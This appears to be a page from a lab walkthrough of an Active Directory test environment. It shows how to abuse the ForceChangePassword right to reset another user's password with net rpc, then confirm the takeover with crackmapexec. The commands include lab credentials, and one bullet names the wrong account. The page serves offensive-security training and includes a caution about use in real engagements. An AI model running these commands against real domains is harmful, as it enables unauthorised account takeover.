# ForceChangePassword on User (Donald-> Hugo)

* This one should never be done in a pentest (unless the customer is ok with that). You don’t want to block a user during your audit.
* As Donald.Trump we will change Hugo.Chavez password

  <figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FfOyekU4Lp3742SOBfunz%2Fimage.png?alt=media&#x26;token=e314e8ed-bb39-4569-b16b-e84eabcb0ff4" alt=""><figcaption></figcaption></figure>

```
net rpc password hugo.chavez -U newyork.local/Donald.Trump%MaKeam3ricaGr3at -S nyc.newyork.local
```

* We set the new Donald.Trump password.
* And verify the password is ok.

```
crackmapexec smb 192.168.56.10 -u hugo.chavez -d newyork.local -p 123456
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FA2i5Vqipr12vdmMhbSDa%2Fimage.png?alt=media&#x26;token=527df7fc-28f5-4d3e-b21f-776cd1318141" alt=""><figcaption></figcaption></figure>
